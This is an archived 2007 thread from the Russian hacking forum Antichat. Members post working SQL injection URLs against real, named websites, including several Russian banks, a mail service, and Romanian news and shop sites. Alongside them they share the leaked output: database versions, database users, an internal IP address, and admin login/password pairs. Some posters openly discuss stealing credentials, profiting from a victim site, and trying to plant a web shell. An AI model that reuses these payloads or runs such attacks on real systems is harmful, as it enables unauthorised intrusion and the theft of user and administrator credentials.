ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3771  
Старый 21.11.2007, 19:45
fntms
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме:
65178

Репутация: 21
Отправить сообщение для fntms с помощью ICQ
По умолчанию

http://www.spylog.ru/

http://dir.spylog.ru/index1.phtml?group=5480%20and%201=5%20union%20sele ct%201%20from%20mysql.user/*

все, что нашел..

таблица
rating.sites
поля
id, name, url, descr


если кто чего еще найдет, отпишитесь, есть некоторые соображения..в плане выжимки бабла с этого сраного спайлога.
 
Ответить с цитированием

  #3772  
Старый 21.11.2007, 22:00
v1ru$
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085

Репутация: 576
Отправить сообщение для v1ru$ с помощью ICQ
По умолчанию

Код:
http://mosdor.ru/?item&id=-3/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(version(),0x3a,database(),0x3a,user()),23,24,25,26,27,28,29,30,31/*
db_andred_4:dbu_andred_4@192.168.3.72
 
Ответить с цитированием

  #3773  
Старый 21.11.2007, 22:16
min7
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022

Репутация: 259
По умолчанию

Код:
http://www.turistor.ro/art/articol.php?id=-7+union+select+1,2,3,4,concat_ws(char(58,58),user(),database(),version()),6,7,8,9,10/*
ovidiuc@localhost::turistor::5.0.32-Debian_7etch1-log
Нашёл таблицу membri, дальше не раскручивал.
 
Ответить с цитированием

  #3774  
Старый 22.11.2007, 00:01
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.citroen-club.kiev.ua/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user())/*

4.1.22/cit

-----------------------------------------------------------------------------

http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*

5.0.44-log/news/infonet@localhost



http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,uname,passwd),3,4, 5,6,7,8,9+from+admin+limit+0,1/*

логин/пароль
master/newsbase + еще 6 юзеров
 
Ответить с цитированием

  #3775  
Старый 22.11.2007, 01:39
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Сайт о кино... http://ww.rmdb.ru/?movie&id=-1+union+select+version(),user()/*
БД 4 =\
 
Ответить с цитированием

  #3776  
Старый 22.11.2007, 08:19
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Румыния

semneparticulare.ro
Код:
http://www.semneparticulare.ro/index.php?catid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9/*&catname=Editorial
4.1.22-standard-log:semnepar_ziar:semnepar_semnepa@localhost

linkmagazine.ro
Код:
http://www.linkmagazine.ro/articol.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10/*
4.1.22-standard-log:linkmag_linkmag:linkmag_linkmag@localhost

garsonieraluimaruta.ro
Код:
http://www.garsonieraluimaruta.ro/invitatilist.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7/*
4.1.22-standard:garson_main:garson_main@localhost

saloane.ro
Код:
http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/*
5.0.24a-standard-log:saloane:saloane@goober.dreamhost.com

24 открытых таблицы:
Код:
http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+limit+23,1/*
... и ни одной интересной

сайт админят скорее всего по фтп: ftp.saloane.ro
 
Ответить с цитированием

  #3777  
Старый 22.11.2007, 12:51
fntms
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме:
65178

Репутация: 21
Отправить сообщение для fntms с помощью ICQ
По умолчанию

http://maxitour.ru/hotels?id=-311%20union%20select%201,2,3,4,5,6,7,8,9,10,11,pas sw,13,14,15,16,17,18,19,20,21,22%20from%20users%20/*

все понятно без слов.. пароль расшифруется в три минуты.. а равен он логину..а логин макситурс вроде

http://www.newkenigsberg.ru/index.php?change=-21%20union%20select%201,2,3,concat(login,char(47), password,char(47),admin,char(47),Admtm,char(47),ph oto,char(47),Email,char(47),info,char(47),phone,ch ar(47),address,char(47),anons),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,33,32,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48%20from%20auth_user/*

мускул пятый..все на экране...сайт издательского дома еврорубль..в калининграде

газэнергопромбанк..
не знаю кто как..
http://www.geprobank.ru/press/banknews/?article=-1959%20union%20select%201,2,3,4,5,6,table_name,8,t able_schema,10,11,12%20from%20information_schema.t ables%20limit%2015,1/*

пятый мускул..таблицы наружу..чет смыкал смыкмал..ничего интересного ен насмыкал..пишите.


http://mkb.ru/about_bank/work/vacancy.php?id=31%20AND%201=3%20union%20select%201 ,2,AES_DECRYPT(AES_ENCRYPT(column_name,0x71),0x71) ,4,5,6,7,8,9,10,11,12%20from%20information_schema. columns%20where%20table_name='users'%20AND%20table _schema='struct'%20limit%201,1/*

московский кредитный банк.. да защита у банков нынче никакая..еще с менатепа все начинал.. есть две или три таблицы юзерз ..правда инфа в них разнаю.. бд с инфой о юзерах онлайн банкинга находится на другом серваке..пролезть не удалось, если кто откроет новые просторы для боевых действий, просьба отписаться..

вот тут прикольно ..уралвеб..почта!
http://www.uralweb.ru/tourism/index.php?region_sel=all&tour_sel=-4%20UNION%20select%201,2,table_name,4,5,6,7,8,9%20 from%20information_schema.tables%20/*&place=47

есть бд mail..там чет типа аккаунтс или мемберс..ну найти легко, опять же пятый мускул ..смотрим имена таблиц и полей.. находим почтовик с открытыми паролями..юзаем кто кому как надо.. залить шел так и не получилось..
 
Ответить с цитированием

  #3778  
Старый 22.11.2007, 15:47
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.shsb.ru/seminar.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*

4.1.20/nshp/nshp@localhost

-----------------------------------------------------------------
rus.srbc.ru

http://rus.srbc.ru/home.asp?artId=-1+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) Mar 3 2007 18:40:02 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+user)--
all_from_web

http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+db_name())--
BusinessClub

http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+top+1+table_name+from+information_s chema.tables)--

В таблицах не копался
 
Ответить с цитированием

  #3779  
Старый 22.11.2007, 16:28
Holokost
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581

Репутация: 15
По умолчанию

http://www.pollit.ru/?post=-1'
 
Ответить с цитированием

  #3780  
Старый 22.11.2007, 17:44
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

www.theblocparty.org
Код:
_http://www.theblocparty.org/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
www.onlyfabrics.com
Код:
_http://www.onlyfabrics.com/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ЗЫ подробно о скуле в AlstraSoft E-Friends читаем тут: https://forum.antichat.ru/thread54157.html

Последний раз редактировалось -=lebed=-; 22.11.2007 в 17:57..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ